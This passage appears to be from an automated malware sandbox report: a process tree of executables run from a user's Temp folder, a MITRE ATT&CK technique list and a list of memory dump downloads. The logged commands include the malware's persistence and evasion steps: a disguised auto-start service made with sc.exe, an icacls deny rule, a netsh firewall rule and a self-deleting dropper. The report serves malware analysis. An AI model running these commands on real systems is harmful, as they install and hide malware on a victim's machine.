  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:1840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4604

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4644

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4856

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:752

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5984

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\98D6.exe
C:\Users\Admin\AppData\Local\Temp\98D6.exe
1⤵
PID:4744

C:\Users\Admin\AppData\Local\Temp\9B19.exe
C:\Users\Admin\AppData\Local\Temp\9B19.exe
1⤵
PID:4828

C:\Users\Admin\AppData\Local\Temp\9DAA.exe
C:\Users\Admin\AppData\Local\Temp\9DAA.exe
1⤵
PID:5804
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\Users\Admin\AppData\Local\488340c6-1db8-4ad3-b97d-29343a7227b5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2⤵
  - Modifies file permissions
  PID:5896

C:\Users\Admin\AppData\Local\Temp\A973.exe
C:\Users\Admin\AppData\Local\Temp\A973.exe
1⤵
PID:5960

C:\Users\Admin\AppData\Local\Temp\B3B5.exe
C:\Users\Admin\AppData\Local\Temp\B3B5.exe
1⤵
PID:5544

C:\Users\Admin\AppData\Local\Temp\B5B9.exe
C:\Users\Admin\AppData\Local\Temp\B5B9.exe
1⤵
PID:2156
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uzchvyis\
  2⤵
  PID:5084
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\viurkxcm.exe" C:\Windows\SysWOW64\uzchvyis\
  2⤵
  PID:5064
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create uzchvyis binPath= "C:\Windows\SysWOW64\uzchvyis\viurkxcm.exe /d\"C:\Users\Admin\AppData\Local\Temp\B5B9.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:5424
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description uzchvyis "wifi internet conection"
  2⤵
  PID:2188
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start uzchvyis
  2⤵
  PID:5212
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:6092

C:\Users\Admin\AppData\Local\Temp\C1EF.exe
C:\Users\Admin\AppData\Local\Temp\C1EF.exe
1⤵
PID:4868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\C1EF.exe"
  2⤵
  PID:1308

C:\Users\Admin\AppData\Local\Temp\D75D.exe
C:\Users\Admin\AppData\Local\Temp\D75D.exe
1⤵
PID:4780

C:\Windows\SysWOW64\uzchvyis\viurkxcm.exe
C:\Windows\SysWOW64\uzchvyis\viurkxcm.exe /d"C:\Users\Admin\AppData\Local\Temp\B5B9.exe"
1⤵
PID:3268
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:2268

C:\Users\Admin\AppData\Local\Temp\FCF7.exe
C:\Users\Admin\AppData\Local\Temp\FCF7.exe
1⤵
PID:4048

C:\Users\Admin\AppData\Local\Temp\6EB.exe
C:\Users\Admin\AppData\Local\Temp\6EB.exe
1⤵
PID:5392

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:908

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/360-160-0x0000000004A3D000-0x0000000004B3E000-memory.dmp

Filesize
1.0MB

Download
memory/360-161-0x0000000003220000-0x000000000327C000-memory.dmp

Filesize
368KB

Download
memory/964-147-0x0000028D5C8D0000-0x0000028D5C8D2000-memory.dmp

Filesize
8KB

Download
memory/964-178-0x0000028D5D180000-0x0000028D5D1F0000-memory.dmp

Filesize
448KB

Download
memory/1008-169-0x00000133CC560000-0x00000133CC5D0000-memory.dmp

Filesize
448KB

Download
memory/1064-176-0x0000021D7A270000-0x0000021D7A2E0000-memory.dmp

Filesize
448KB

Download
memory/1236-307-0x00000145B3D80000-0x00000145B3DF0000-memory.dmp

Filesize
448KB

Download
memory/1236-184-0x00000145B3CA0000-0x00000145B3D10000-memory.dmp

Filesize
448KB

Download
memory/1260-186-0x00000261A8860000-0x00000261A88D0000-memory.dmp

Filesize
448KB

Download
memory/1368-180-0x00000235F9560000-0x00000235F95D0000-memory.dmp

Filesize
448KB

Download
memory/1824-302-0x0000018F52B40000-0x0000018F52B8B000-memory.dmp

Filesize
300KB

Download
memory/1824-182-0x0000018F53040000-0x0000018F530B0000-memory.dmp

Filesize
448KB

Download
memory/1840-227-0x0000022E6CC90000-0x0000022E6CD8F000-memory.dmp

Filesize
1020KB

Download
memory/1840-167-0x0000022E6A520000-0x0000022E6A590000-memory.dmp

Filesize
448KB

Download
memory/2252-226-0x0000000002930000-0x0000000002932000-memory.dmp

Filesize
8KB

Download
memory/2336-174-0x0000023ABF850000-0x0000023ABF8C0000-memory.dmp

Filesize
448KB

Download
memory/2336-143-0x0000023ABF0C0000-0x0000023ABF0C2000-memory.dmp

Filesize
8KB

Download
memory/2376-172-0x000001565C440000-0x000001565C4B0000-memory.dmp

Filesize
448KB

Download
memory/2392-193-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2536-166-0x0000018121CD0000-0x0000018121D40000-memory.dmp

Filesize
448KB

Download
memory/2572-203-0x0000000003060000-0x0000000003062000-memory.dmp

Filesize
8KB

Download
memory/2624-188-0x0000024DE6610000-0x0000024DE6680000-memory.dmp

Filesize
448KB

Download
memory/2632-190-0x0000022E04A00000-0x0000022E04A70000-memory.dmp

Filesize
448KB

Download
memory/2632-309-0x0000022E04DB0000-0x0000022E04E20000-memory.dmp

Filesize
448KB

Download
memory/2648-230-0x0000000001352000-0x0000000001354000-memory.dmp

Filesize
8KB

Download
memory/2648-238-0x0000000001355000-0x0000000001357000-memory.dmp

Filesize
8KB

Download
memory/2648-215-0x0000000001350000-0x0000000001352000-memory.dmp

Filesize
8KB

Download
memory/2648-237-0x0000000001354000-0x0000000001355000-memory.dmp

Filesize
4KB

Download
memory/3076-199-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3104-206-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3264-162-0x00000233E6000000-0x00000233E604B000-memory.dmp

Filesize
300KB

Download
memory/3264-163-0x00000233E6280000-0x00000233E62F0000-memory.dmp

Filesize
448KB

Download
memory/3264-311-0x00000233E65E0000-0x00000233E6650000-memory.dmp

Filesize
448KB

Download
memory/3384-126-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

Filesize
4KB

Download
memory/3384-171-0x000000001BAB0000-0x000000001BAB2000-memory.dmp

Filesize
8KB

Download
memory/3384-137-0x0000000002FF0000-0x0000000002FF1000-memory.dmp

Filesize
4KB

Download
memory/3384-131-0x0000000001710000-0x000000000172C000-memory.dmp

Filesize
112KB

Download
memory/3384-128-0x0000000001700000-0x0000000001701000-memory.dmp

Filesize
4KB

Download
memory/3392-239-0x0000000003135000-0x0000000003136000-memory.dmp

Filesize
4KB

Download
memory/3392-234-0x0000000003132000-0x0000000003134000-memory.dmp

Filesize
8KB

Download
memory/3392-228-0x0000000003130000-0x0000000003132000-memory.dmp

Filesize
8KB

Download
memory/3464-216-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4180-233-0x00000000009D0000-0x00000000009DD000-memory.dmp

Filesize
52KB

Download
memory/4180-248-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/4324-258-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/4324-264-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/4404-275-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/4404-276-0x00000000008B0000-0x00000000008C2000-memory.dmp

Filesize
72KB

Download
memory/4912-253-0x0000000140000000-0x0000000140383000-memory.dmp

Filesize
3.5MB

Download
memory/4912-249-0x0000000140000000-0x0000000140383000-memory.dmp

Filesize
3.5MB

Download
memory/4920-263-0x0000000002380000-0x00000000023C4000-memory.dmp

Filesize
272KB

Download
memory/4956-267-0x000002E0303E0000-0x000002E030400000-memory.dmp

Filesize
128KB

Download
memory/4956-256-0x000002E030030000-0x000002E030044000-memory.dmp

Filesize
80KB

Download
memory/4956-257-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/4956-254-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/5832-301-0x00000000042AD000-0x00000000043AE000-memory.dmp

Filesize
1.0MB

Download
memory/5832-303-0x00000000043B0000-0x000000000440C000-memory.dmp

Filesize
368KB

Download
memory/6056-283-0x00000000036F0000-0x0000000003700000-memory.dmp

Filesize
64KB

Download
memory/6056-277-0x0000000003550000-0x0000000003560000-memory.dmp

Filesize
64KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads